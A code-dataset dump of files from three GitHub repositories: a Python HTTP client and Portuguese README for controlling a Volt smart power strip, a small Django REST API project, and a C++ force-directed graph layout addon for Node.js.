self.dhcp.setChecked(True if vd.lastInfo['devdhcp'] == 'true' else False)\n\n self.nt1.setText(vd.getNomeAC(1))\n self.nt2.setText(vd.getNomeAC(2))\n self.nt3.setText(vd.getNomeAC(3))\n self.nt4.setText(vd.getNomeAC(4))\n self.nt5.setText(vd.getNomeAC(5))\n self.nt6.setText(vd.getNomeAC(6))\n self.nt7.setText(vd.getNomeAC(7))\n self.nt8.setText(vd.getNomeAC(8))\n self.nt9.setText(vd.getNomeAC(9))\n self.nt10.setText(vd.getNomeAC(10))\n else: self.enableComponents(False)\n \n\n\n def alert(self, window, title, message):\n QMessageBox.about(window, title, message)"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 34,
"blob_id": "2349188c31f73432ba7b76536466b48263257acf",
"content_id": "3387cb7e3c722049d6d3a98da7d9a44be2e999e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 12,
"path": "/teste.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "\nfrom voltdevice import VoltDevice\n\n\n\nvd = VoltDevice('admin','voltvol','192.168.0.90')\n#print(vd.lastInfo)#imprime todas as informações adquiridas do equipamento\n#print(vd.configEthernet(False, 'HOST1', '192.168.0.91', '192.168.0.6', '255.255.255.0', '8.8.8.8', '8.8.4.3'));#config ethernet\n#print(vd.ctrlAc(3,0,''))\n\n#resp = vd.reqGETHTTP('http://'+vd.ip+'/status.json');\n#print(resp.status_code);\n#print(resp.json());"
},
{
"alpha_fraction": 0.6243256330490112,
"alphanum_fraction": 0.6545692086219788,
"avg_line_length": 40.33783721923828,
"blob_id": "75c0cb80fd12eb9cc2fe189664a94d11d673a274",
"content_id": "6f891f8191f94e1d1bb40797695d9d9d2c552be9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6215,
"license_type": "no_license",
"max_line_length": 234,
"num_lines": 148,
"path": "/README.md",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "# Exemplo API Java para Filtro de Linha Smart Web\n\n## 1. Importe as classe necessária\n from voltdevice import VoltDevice\n\n## 2. Instancie um objeto de FiltroSmartWeb\n\n \"\"\"\n O objeto deve ser instanciado passando 3 argumentos:\n -username: String = nome de usuário para autenticação\n -password: String = senha de usuário para autenticação\n -ip: Endereço IP do equipamento\n \"\"\"\n self.vd = VoltDevice('admin','voltvolt','192.168.0.90')\n \n \n## 3. Funções\n\n### 3.1. Atualizar informações salvas no objeto equip\n \"\"\" def updateInfo(self)\n\n Este método realiza uma requisição GET ao equipamento pedindo as informações atualizadas e retorna um valor inteiro com o código de resposta HTTP.\n É responsável por atualizar todos os atributos do objeto com as informações recebidas, como estado das tomadas, temperatura e outros parâmetros e configurações do equipamento.\n Retorno: \n -200: Requisição realizada com sucesso e Informações atualizadas no objeto\n -401: Requisição recusada por falha na autenticação\n -500: Equipamento inacessível \n\n \"\"\"\n\n resp = self.vd.updateInfo()\n\n### 3.2. Informações do equipamento\n\n#### 3.2.1 Informação de status da tomada (Ligada/Desligada)\n\n \"\"\"def getAc(self, tomada):\n A função retorna uma Boolean com o status (True = ligada / False: desligada) da tomada (1-10) passada como argumento \n resp = self.vd.getAc(tomada):\n \"\"\"\n #Exemplo:\n stTomada1 = self.vd.getAc(1);\n #print(stTomada1) #True/False\n\n#### 3.2.2 Informação de status da tomada (Habilitada/Desabilitada)\n\n \"\"\"def getRmac(self, tomada):\n A função retorna uma Boolean com o status (True = Habilitada / False: Desabilitada) da tomada (1-10) passada como argumento \n resp = self.vd.getRmac(tomada):\n \"\"\"\n #Exemplo:\n stTomada1 = self.vd.getRmac(1);\n #print(stTomada1) #True/False\n\n#### 3.2.3 Nome da tomada (Ligada/Desligada)\n\n \"\"\"def getNomeAc(self, tomada):\n A função retorna uma String com o status (True = ligada / False: desligada) da tomada (1-10) passada como argumento \n resp = self.vd.getNomeAc(tomada):\n \"\"\"\n #Exemplo:\n NomeTomada1 = self.vd.getNomeAc(1);\n #print(NomeTomada1)\n\n#### 3.2.4 Uptime do equipamento\n\n \"\"\"def getUptime(self):\n A função retorna uma String com o uptime do equipamento\n Exemplo de retorno: '12d10h8m' \n resp = self.vd.getUptime()\n \"\"\"\n #Exemplo:\n uptime = self.vd.getNomeAc(1);\n #print(uptime) \n\n### Preparando restante da biblioteca para manipulação das informações\n\n\n\n## 4. Controle de Tomadas\n \"\"\" def ctrlAc(self, tomada, op, habilita=True, ac_name=\"\")\n\n Ao método controlTomda, devem ser passados os argumentos: \n -tomada: number:(0-10) tomada que receberá o comando\n -op:Comando a ser enviado à tomada (0:liga/desliga ; 1:habilita/desabilita e configura nome da porta)\n -habilita: opcional Boolean para infomar a configuração a ser realizada na tomada( True: Habilitar / False: Desabilitar)\n -ac_name: opcional string com um nome para a porta, obrigatório para op 1(mudar nome da porta). Caso op seja 0 , não é necessário esse argumento para o método\n\n Este método retorna um objeto requests.Response com o código de resposta HTTP da requisição realizada no atributo status_code e a informação de erro em caso de código de resposta diferente de 200, acessível no atributo content\n {\n 200: sucesso\n 401: Falha na autenticacação\n 500: Equipamento não localizado\n }\n \"\"\"\n\n resp = self.vd.ctrlAc(tomada, op, habilita, ac_name); \n \n\n### Exemplos:\n### 4.1. Ligar/Desligar Tomada:\n resp = self.vd.ctrlAc(1,0) #args: tomada 1 e op 0. Inverte o estado da tomada 1 (Liga/Desliga)\n #print(resp.status_code)\n #print(resp.content.decode())# devido ao atributo content ser em bytes\n\n### 4.2. Configurar status (Habilitada/Desabilitada) e nome da Tomada:\n resp = self.vd.ctrlAc(3, 2, True, 'teste_tomada'); #args: tomada 3, op 2 e habilita True. Configura o status da tomada como 'Habilitada' e o nome da tomada 3 para 'teste_tomada'\n #print(resp.status_code)\n #print(resp.content.decode())# devido ao atributo content ser em bytes\n \n\n## 5. Configurar interface Ethernet\n \n \"\"\" def configEthernet(self, boolDhcp, newhost, newip, newgtw, newmask, newdns1, newdns2):\n\n À função configEthernet, devem ser passados os argumentos: \n -boolDhcp: Boolean (True habilita DHCP do equipamento / False desabilita)\n -newhost: String ( Hostname à ser configurado no equipamento)\n -newip: String ( Endereço IP a ser configurado no equipamento)\n -newgtw: String ( Endereço de gateway a ser configurado no equipamento)\n -newmask: String ( Máscara de rede a ser configurada no equipamento)\n -newdns1: String ( Endereço de DNS primário)\n -newdns2: String ( Endereço de DNS secundário)\n\n Este método retorna um objeto requests.Response com o código de resposta HTTP da requisição realizada no atributo status_code e a informação de erro em caso de código de resposta diferente de 200, acessível no atributo content\n {\n 200: sucesso\n 401: Falha na autenticacação\n 500: Equipamento não localizado\n }\n\n \"\"\"\n resp = self.vd.configEthernet(boolDhcp, newhost, newip, newgtw, newmask, newdns1, newdns2)\n### Exemplo\n \"\"\"\n Configurar a interface de rede com os argumentos:\n Hostname: 'Filtro de Linha'\n IP: '192.168.0.91'\n Gateway: '192.168.0.1'\n Máscara de rede: '255.255.255.0'\n DNS Primário: '8.8.8.8'\n DNS Secundário: '8.8.4.4'\n\n \n \"\"\"\n resp = self.vd.configEthernet(False, 'Filtro de Linha', '192.168.0.91', '192.168.0.1', '255.255.255.0', '8.8.8.8', '8.8.4.4');\n #print(resp.status_code)\n #print(resp.content.decode())# devido ao atributo content ser em bytes"
},
{
"alpha_fraction": 0.5157784223556519,
"alphanum_fraction": 0.5359396934509277,
"avg_line_length": 39.460994720458984,
"blob_id": "18f21e682a8239febae72828480dedf6a21098f2",
"content_id": "cbc8324576b85153bc0af6c6ea98b0ff9bde36d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5706,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 141,
"path": "/voltdevice.py",
"repo_name": "volt-tecnologia/API_PYTHON_Example",
"src_encoding": "UTF-8",
"text": "import requests,json;\nfrom requests.auth import HTTPBasicAuth;\nfrom requests.exceptions import Timeout;\nclass VoltDevice:\n\n def __init__(self, username, password,ip):\n self.ip = ip if len(ip) > 0 else '127.0.0.1'\n self.username = username;\n self.password = password;\n #print(self.updateInfo())\n\n #print(self.lastInfo)\n\n def updateInfo(self):\n resp = self.reqGETHTTP('http://'+self.ip+'/status.json');\n \n if resp.status_code == 200:\n self.lastInfo = resp.json();\n \n #else: \n #print(resp.status_code);\n\n #self.lastInfo = 0;\n \n return resp.status_code;\n\n def reqGETHTTP(self, url):\n print(url);\n try:\n response = requests.get(url,auth=HTTPBasicAuth(self.username,self.password), timeout=2);\n #print(response.status_code)\n if response.status_code == 401:\n response._content = b''\n\n return response;\n except Timeout:\n print('Erro de Timeout')\n response = requests.Response()\n response.status_code = 500\n response._content = b''\n \n return response\n\n \n def reqPOSTHTTP(self, url, payload):\n print(url);\n try:\n response = requests.post(url,auth=HTTPBasicAuth(self.username,self.password),data=payload, timeout=2);\n #print(response.status_code)\n return response;\n except Timeout:\n print('Erro de Timeout')\n response = requests.Response()\n response.status_code = 500\n response._content = b''\n \n return response\n\n def configEthernet(self, boolDhcp, newhost, newip, newgtw, newmask, newdns1, newdns2):\n payload = {'dhcp':('true' if boolDhcp == True else 'false'),'host':newhost,'ip':newip,'gw':newgtw,'sub':newmask,'dns1':newdns1, 'dns2':newdns2}\n #print(payload)\n response = self.reqPOSTHTTP('http://'+self.ip+'/config.htm?', payload)\n \n if(response.status_code == 200): \n response = self.reqGETHTTP(\"http://\" + self.ip + \"/reset.cgi?timeout=1\")\n return response\n else: \n return response\n \n\n def ctrlAc(self, tomada, op, habilita=True, ac_name=lambda: getNomeAC(tomada)):\n if(self.lastInfo != 0):\n \n if op == 0:\n if(self.getRmac(tomada)): \n return self.reqGETHTTP(\"http://\" + self.ip + \"/outpoe.cgi?poe=\" + str(tomada) + \"&sts=\"+('0' if self.getAc(tomada) else'1')+\"&pr=0\");\n \n else: \n response = requests.Response()\n response.status_code = 0\n response._content = b'Porta '+str(tomada).encode()+b' desabilitada!!'\n return response\n \n elif op == 1: \n #if(len(ac_name)>0):\n return self.reqGETHTTP(\"http://\" + self.ip + \"/output.htm?porta=\" + str(tomada) + \"&rmac=\" + (\"true\" if habilita else \"false\") + \"&nt=\" + ac_name);\n \n #else: return \"Digite um nome válido para a tomada!!\";\n \n else: return 'Equipamento não conectado';\n\n def getRmac(self, tomada):\n resp = False\n if tomada == 1: resp = self.lastInfo['rmac1'] == 'true';\n elif tomada == 2: resp = self.lastInfo['rmac2'] == 'true';\n elif tomada == 3: resp = self.lastInfo['rmac3'] == 'true';\n elif tomada == 4: resp = self.lastInfo['rmac4'] == 'true';\n elif tomada == 5: resp = self.lastInfo['rmac5'] == 'true';\n elif tomada == 6: resp = self.lastInfo['rmac6'] == 'true';\n elif tomada == 7: resp = self.lastInfo['rmac7'] == 'true';\n elif tomada == 8: resp = self.lastInfo['rmac8'] == 'true';\n elif tomada == 9: resp = self.lastInfo['rmac9'] == 'true';\n elif tomada == 10: resp = self.lastInfo['rmac10'] == 'true';\n\n return resp;\n\n def getAc(self, tomada):\n resp = False\n if tomada == 1: resp = self.lastInfo['ac0'] =='0';\n elif tomada == 2: resp = self.lastInfo['ac1'] =='0';\n elif tomada == 3: resp = self.lastInfo['ac2'] =='0';\n elif tomada == 4: resp = self.lastInfo['ac3'] =='0';\n elif tomada == 5: resp = self.lastInfo['ac4'] =='0';\n elif tomada == 6: resp = self.lastInfo['ac5'] =='0';\n elif tomada == 7: resp = self.lastInfo['ac6'] =='0';\n elif tomada == 8: resp = self.lastInfo['ac7'] =='0';\n elif tomada == 9: resp = self.lastInfo['ac8'] =='0';\n elif tomada == 10: resp = self.lastInfo['ac9'] =='0';\n\n return resp;\n\n def getNomeAC(self, tomada):\n if tomada == 1: return self.lastInfo['nt1']\n elif tomada == 2: return self.lastInfo['nt2']\n elif tomada == 3: return self.lastInfo['nt3']\n elif tomada == 4: return self.lastInfo['nt4']\n elif tomada == 5: return self.lastInfo['nt5']\n elif tomada == 6: return self.lastInfo['nt6']\n elif tomada == 7: return self.lastInfo['nt7']\n elif tomada == 8: return self.lastInfo['nt8']\n elif tomada == 9: return self.lastInfo['nt9']\n elif tomada == 10: return self.lastInfo['nt10']\n\n def getDate(self):\n return self.lastInfo['rtc_days']+'/'+self.lastInfo['rtc_months']+'/'+self.lastInfo['rtc_years']\n\n def getTime(self):\n return self.lastInfo['rtc_hours']+':'+self.lastInfo['rtc_minutes']+':'+self.lastInfo['rtc_seconds']\n\n def getUptime(self):\n return self.lastInfo['updia']+'d '+self.lastInfo['uphora']+'h '+self.lastInfo['upmin']+'m'"
}
] | 5 |
ujjval15/My-blog
|
https://github.com/ujjval15/My-blog
|
f2ee13740c44b2995b4291599eefc44f4db2988e
|
542efe29f625ca33b2feda5c0f59aa9cbe270470
|
e14ec293f63f00aef3bbd9640fbe9e0bf1112478
|
refs/heads/main
| 2023-02-13T06:55:32.821153 | 2020-12-26T18:12:20 | 2020-12-26T18:12:20 | 324,607,707 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7513513565063477,
"alphanum_fraction": 0.7513513565063477,
"avg_line_length": 35.20000076293945,
"blob_id": "637e353ec25dcb6c00dd03b64dee0cd541186096",
"content_id": "68a40a1e6c5449483a5f0a0bc9c7e3533c1c3b95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 5,
"path": "/homes/views.py",
"repo_name": "ujjval15/My-blog",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, HttpResponse, redirect\nfrom blog.models import Post\n# Create your views here.\ndef home(request): \n return render(request, \"home/home.html\")\n\n\n\n\n"
}
] | 1 |
sarun11/REST_API_Django
|
https://github.com/sarun11/REST_API_Django
|
17f212aa139e7e911eba9992ccf8e4fa7859a1b5
|
2231ae5b2b16d80eeceba7588f94b61ca00a808f
|
f3c3574e480014cedaedd8ef04674508fc6e6299
|
refs/heads/main
| 2023-01-19T14:02:59.161790 | 2020-11-25T11:09:08 | 2020-11-25T11:09:08 | 315,597,658 | 0 | 0 | null | 2020-11-24T10:32:41 | 2020-11-25T09:35:49 | 2020-11-25T11:09:08 |
Python
|
[
{
"alpha_fraction": 0.7011764645576477,
"alphanum_fraction": 0.7176470756530762,
"avg_line_length": 27.33333396911621,
"blob_id": "d09160c29c7767b50ffe0b50e641d60650ec9c3b",
"content_id": "e5976618438108e46b6d7df37717bd0ff6194990",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/core/models.py",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth import get_user_model\n# Create your models here.\n\n\nUser = get_user_model()\n\nclass Post(models.Model):\n title = models.CharField(max_length=1000)\n description = models.CharField(max_length=500) \n date_created = models.DateTimeField(auto_now_add=True)\n owner = models.ForeignKey(User, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.title\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 25,
"blob_id": "80c187fead4efe8a9d5d5ebc6abb4010f51ef5f4",
"content_id": "db30312c049c928c69700b009cad307b5a42b40a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "# REST_API_Django\nREST API Development using Django\n"
},
{
"alpha_fraction": 0.5022421479225159,
"alphanum_fraction": 0.6995515823364258,
"avg_line_length": 16.153846740722656,
"blob_id": "6f5c3674127458304f87b924a47b56a94f9fca48",
"content_id": "dfb80a96b7db317067ba4387a7de7eb175dd4401",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 13,
"path": "/requirements.txt",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "asgiref==3.3.1\nDjango==3.1.3\ndjango-rest-auth==0.9.5\ndjangorestframework==3.12.2\nflake8==3.8.4\nimportlib-metadata==3.1.0\nmccabe==0.6.1\npycodestyle==2.6.0\npyflakes==2.2.0\npytz==2020.4\nsix==1.15.0\nsqlparse==0.4.1\nzipp==3.4.0\n"
},
{
"alpha_fraction": 0.6454976201057434,
"alphanum_fraction": 0.649289071559906,
"avg_line_length": 26.05128288269043,
"blob_id": "67d5fdf6f3b018b1aefc092c3a41d59f16f7e290",
"content_id": "4007cc34c10ad64c7e98d82ac84f6b1202eda106",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1055,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 39,
"path": "/core/views.py",
"repo_name": "sarun11/REST_API_Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom .models import Post\nfrom .serializers import PostSerializer\n\n# third party imports\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAuthenticated\n\n# Create your views here.\n\n\nclass TestView(APIView):\n \n permission_classes = (IsAuthenticated,)\n \n def get(self, request, *args, **kwargs):\n \n qs = Post.objects.all()\n # post = qs.last()\n serializer = PostSerializer(qs, many=True)\n # serializer = PostSerializer(post)\n return Response(serializer.data)\n \n def post(self, request, *args, **kwargs):\n serializer = PostSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors) \n\n# def test_view(request):\n# data = {\n# 'book': 30,\n# 'Pen': 10\n# }\n# return JsonResponse(data)\n"
}
] | 4 |
TimHollies/ngraph.native
|
https://github.com/TimHollies/ngraph.native
|
40fb210fcc08f275bf4f31af8451deed9fff228b
|
8d994ec9fa57779c2f44a16436b6f6e0c2c8ee62
|
a4d9601a96dfff0c48b7294c924fb7559b3774be
|
refs/heads/master
| 2021-09-14T22:33:09.222933 | 2018-05-21T13:35:54 | 2018-05-21T13:35:54 | 109,813,554 | 0 | 0 | null | 2017-11-07T09:23:31 | 2017-10-06T20:07:33 | 2017-10-03T23:27:34 | null |
[
{
"alpha_fraction": 0.35039371252059937,
"alphanum_fraction": 0.35433071851730347,
"avg_line_length": 23.190475463867188,
"blob_id": "0f916a1f638bf149f6992355cf8f33f74bc9bdb1",
"content_id": "efeb556603a9f73328ef42133fe9b214180ff67d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 21,
"path": "/binding.gyp",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "{\n \"targets\": [\n {\n \"target_name\": \"force-layout\",\n \"sources\": [ \"src/main.cc\", \"src/layout.cc\", \"src/quadTree.cc\" ],\n 'conditions': [\n ['OS==\"win\"', {\n 'cflags': [\n '/WX', \"/std:latest\", \"/m\"\n ],\n }, { # OS != \"win\"\n 'cflags': [\n \"-std=c++11\", \"-fpermissive\", \"-fexceptions\"\n ],\n }],\n ],\n 'cflags!': [ '-fno-exceptions' ],\n 'cflags_cc!': [ '-fno-exceptions' ]\n }\n ]\n}\n"
},
{
"alpha_fraction": 0.5709206461906433,
"alphanum_fraction": 0.584955096244812,
"avg_line_length": 27.4255313873291,
"blob_id": "854003ff335b49e3cc3e7a599bbc23024a6635a0",
"content_id": "2bebc4ef16291fc1f78bd3205b4ae3796fcb9a6b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5344,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 188,
"path": "/src/layout.cc",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "//\n// layout.cpp\n// layout++\n//\n// Created by Andrei Kashcha on 5/21/15.\n// Copyright (c) 2015 Andrei Kashcha. All rights reserved.\n//\n\n#include \"layout.h\"\n#include <iostream>\n#include <cmath>\n#include <map>\n\nLayout::Layout() :tree(settings) {}\n\nvoid Layout::init(int* bodyIds, size_t bodyIdSize, int* links, long size) {\n random = Random(42);\n initBodies(bodyIds, bodyIdSize, links, size);\n\n // Now the graph is initialized. Let's make sure we get\n // good initial positions:\n setDefaultBodiesPositions();\n}\n\nvoid Layout::loadPositionsFromArray(int *initialPositions) {\n for (size_t i = 0; i < bodies.size(); ++i) {\n Vector2 initialPos(initialPositions[i * 3 + 0], //+ Random::nextDouble(),\n initialPositions[i * 3 + 1] //+ Random::nextDouble(),\n );\n bodies[i].setPos(initialPos);\n }\n}\n\nvoid Layout::setDefaultBodiesPositions() {\n size_t maxBodyId = bodies.size();\n for (size_t i = 0; i < maxBodyId; ++i) {\n bodies[i].setPos(Vector2(0,0));\n // Body *body = &(bodies[i]);\n // if (!body->positionInitialized()) {\n // Vector2 initialPos(random.nextDouble() * log(maxBodyId) * 100,\n // random.nextDouble() * log(maxBodyId) * 100);\n // bodies[i].setPos(initialPos);\n // }\n // Vector2 *sourcePos = &(body->pos);\n // // init neighbours position:\n // for (size_t j = 0; j < body->springs.size(); ++j) {\n // if (!bodies[body->springs[j]].positionInitialized()) {\n // Vector2 neighbourPosition(\n // sourcePos->x + random.next(settings.springLength) - settings.springLength/2,\n // sourcePos->y + random.next(settings.springLength) - settings.springLength/2\n // );\n // bodies[j].setPos(neighbourPosition);\n // }\n // }\n }\n}\n\nvoid Layout::initBodies(int* bodyIds, size_t bodyIdSize, int* links, long size) {\n\n std::map<int, size_t> bodyMap;\n\n bodies.reserve(bodyIdSize);\n for (int i = 0; i < bodyIdSize; i++) {\n bodies.push_back(Body(bodyIds[i]));\n bodyMap[bodyIds[i]] = i;\n }\n\n // Now that we have bodies, let's add links:\n for (int i = 0; i < size; i+=2) {\n bodies[bodyMap.at(links[i])].springs.push_back(bodyMap.at(links[i+1]));\n bodies[bodyMap.at(links[i+1])].incomingCount += 1;\n }\n\n // Finally, update body mass based on total number of neighbours:\n for (size_t i = 0; i < bodies.size(); i++) {\n Body *body = &(bodies[i]);\n // TODO: Dividing by 2 rather than 3 due to changing to 2d only?\n body->mass = 1 + (body->springs.size() + body->incomingCount)/3.0;\n }\n}\n\nvoid Layout::setBodiesWeight(int *weights) {\n // FIXME: Verify that size of the weights matches size of the bodies.\n // Unfortunately current graph format does not properly store nodes without\n // edges.\n for (size_t i = 0; i < bodies.size(); i++) {\n Body *body = &(bodies[i]);\n body->mass = weights[i];\n }\n}\n\nsize_t Layout::getBodiesCount() {\n return bodies.size();\n}\n\nbool Layout::step() {\n accumulate();\n double totalMovement = integrate();\n // cout << totalMovement << \" move\" << endl;\n return totalMovement < settings.stableThreshold;\n}\n\nvoid Layout::accumulate() {\n tree.insertBodies(bodies);\n\n #pragma omp parallel for\n for (size_t i = 0; i < bodies.size(); i++) {\n Body* body = &bodies[i];\n body->force.reset();\n\n tree.updateBodyForce(&(*body));\n updateDragForce(&(*body));\n }\n\n #pragma omp parallel for\n for (size_t i = 0; i < bodies.size(); i++) {\n Body* body = &bodies[i];\n updateSpringForce(&(*body));\n }\n}\n\ndouble Layout::integrate() {\n double dx = 0, tx = 0,\n dy = 0, ty = 0,\n timeStep = settings.timeStep;\n\n//dx should be private or defined inside loop\n //tx need to be reduction variable, or its value will be unpredictable.\n #pragma omp parallel for reduction(+:tx,ty) private(dx,dy)\n for (size_t i = 0; i < bodies.size(); i++) {\n Body* body = &bodies[i];\n double coeff = timeStep / body->mass;\n\n body->velocity.x += coeff * body->force.x;\n body->velocity.y += coeff * body->force.y;\n\n double vx = body->velocity.x,\n vy = body->velocity.y,\n v = sqrt(vx * vx + vy * vy);\n\n if (v > 1) {\n body->velocity.x = vx / v;\n body->velocity.y = vy / v;\n }\n\n dx = timeStep * body->velocity.x;\n dy = timeStep * body->velocity.y;\n\n body->pos.x += dx;\n body->pos.y += dy;\n\n tx += abs(dx); ty += abs(dy);\n }\n\n return (tx * tx + ty * ty)/bodies.size();\n}\n\nvoid Layout::updateDragForce(Body *body) {\n body->force.x -= settings.dragCoeff * body->velocity.x;\n body->force.y -= settings.dragCoeff * body->velocity.y;\n}\n\nvoid Layout::updateSpringForce(Body *source) {\n\n Body *body1 = source;\n for (size_t i = 0; i < source->springs.size(); ++i){\n Body *body2 = &(bodies[source->springs[i]]);\n\n double dx = body2->pos.x - body1->pos.x;\n double dy = body2->pos.y - body1->pos.y;\n double r = sqrt(dx * dx + dy * dy);\n\n if (r == 0) {\n dx = (random.nextDouble() - 0.5) / 50;\n dy = (random.nextDouble() - 0.5) / 50;\n r = sqrt(dx * dx + dy * dy);\n }\n\n double d = r - settings.springLength;\n double coeff = settings.springCoeff * d / r;\n\n body1->force.x += coeff * dx;\n body1->force.y += coeff * dy;\n\n body2->force.x -= coeff * dx;\n body2->force.y -= coeff * dy;\n }\n}\n"
},
{
"alpha_fraction": 0.5667870044708252,
"alphanum_fraction": 0.6050541400909424,
"avg_line_length": 17.97260284423828,
"blob_id": "ccbbc16d659a0f8e79792872d1883e566e8355a8",
"content_id": "ad01cbadac660d2aea80de7f8a565d05e32371aa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1385,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 73,
"path": "/src/primitives.h",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "//\n// primitives.h\n// layout++\n//\n// Created by Andrei Kashcha on 5/21/15.\n// Copyright (c) 2015 Andrei Kashcha. All rights reserved.\n//\n\n#ifndef layout___primitives_h\n#define layout___primitives_h\n\n#include <cmath> // std::abs\n#include <vector>\n\nstruct LayoutSettings {\n double stableThreshold = 0.009;\n double gravity = -1.2;\n double theta = 1.2;\n double dragCoeff = 0.02;\n double springCoeff = 0.0008;\n double springLength = 30;\n double timeStep = 20;\n};\n\nstruct Vector2 {\n double x = 0.0;\n double y = 0.0;\n\n Vector2(double _x, double _y) :\n x(_x), y(_y) {};\n\n Vector2() {}\n\n void reset () {\n x = y = 0;\n }\n\n bool sameAs(const Vector2 &other) {\n\n double dx = std::abs(x - other.x);\n double dy = std::abs(y - other.y);\n\n return (dx < 1e-8 && dy < 1e-8);\n }\n};\n\nstruct Body {\n int label;\n Vector2 pos;\n Vector2 prevPos;\n Vector2 force;\n Vector2 velocity;\n double mass = 1.0;\n\n std::vector<int> springs; // these are outgoing connections.\n // This is just a number of incoming connections for this body,\n // so we can count its mass appropriately.\n int incomingCount = 0;\n\n Body(int _label): label(_label) { }\n Body(int _label, Vector2 _pos): label(_label), pos(_pos), prevPos(_pos) {}\n\n void setPos(const Vector2 &_pos) {\n pos = _pos;\n prevPos = _pos;\n }\n\n bool positionInitialized() {\n return pos.x != 0 || pos.y != 0;\n }\n};\n\n#endif\n"
},
{
"alpha_fraction": 0.6208112835884094,
"alphanum_fraction": 0.6384479999542236,
"avg_line_length": 22.625,
"blob_id": "d57d52d1a92999ee04a590e9e91bd9ebb7047d1f",
"content_id": "4f2403e07f477b6b07f7c2f94576be5c2d3fd3e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 567,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 24,
"path": "/ngraph.native.js",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "var addon = require('bindings')('force-layout');\n\nconst run = (nodes, edges, iterations) => {\n\n const nodeTArray = Int32Array.from(nodes);\n const edgeTArray = Int32Array.from(Array.prototype.concat(...edges));\n\n const rawTArrayResult = addon.runLayout(nodeTArray, edgeTArray, iterations); // 'world'\n\n const rawResult = Array.from(rawTArrayResult);\n\n const result = [];\n for(let i=0; i<nodes.length; i+=1) {\n result.push({\n id: nodes[i],\n x: rawResult[(i*3)+1],\n y: rawResult[(i*3)+2]\n })\n }\n\n return result;\n}\n\nmodule.exports = { run };\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5648148059844971,
"avg_line_length": 17,
"blob_id": "a1dc8961689e844ce3e81c2d67e836368115ca08",
"content_id": "d7818a393ab7466f2116b8993c9b264e2335a939",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 44,
"num_lines": 6,
"path": "/test/main.js",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
"text": "const { run } = require('../ngraph.native');\n\n//smoke\nlet res = run([1,2],[[1,2]], 200);\n\nconsole.log(res);\n"
},
{
"alpha_fraction": 0.6645686030387878,
"alphanum_fraction": 0.6824023127555847,
"avg_line_length": 27.886363983154297,
"blob_id": "a8176e429a8fd1478bc43e8da2dbb7d18ff20ea1",
"content_id": "ce3a821cab400023d5d0385bde3898b30f88a0d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3813,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 132,
"path": "/src/main.cc",
"repo_name": "TimHollies/ngraph.native",
"src_encoding": "UTF-8",
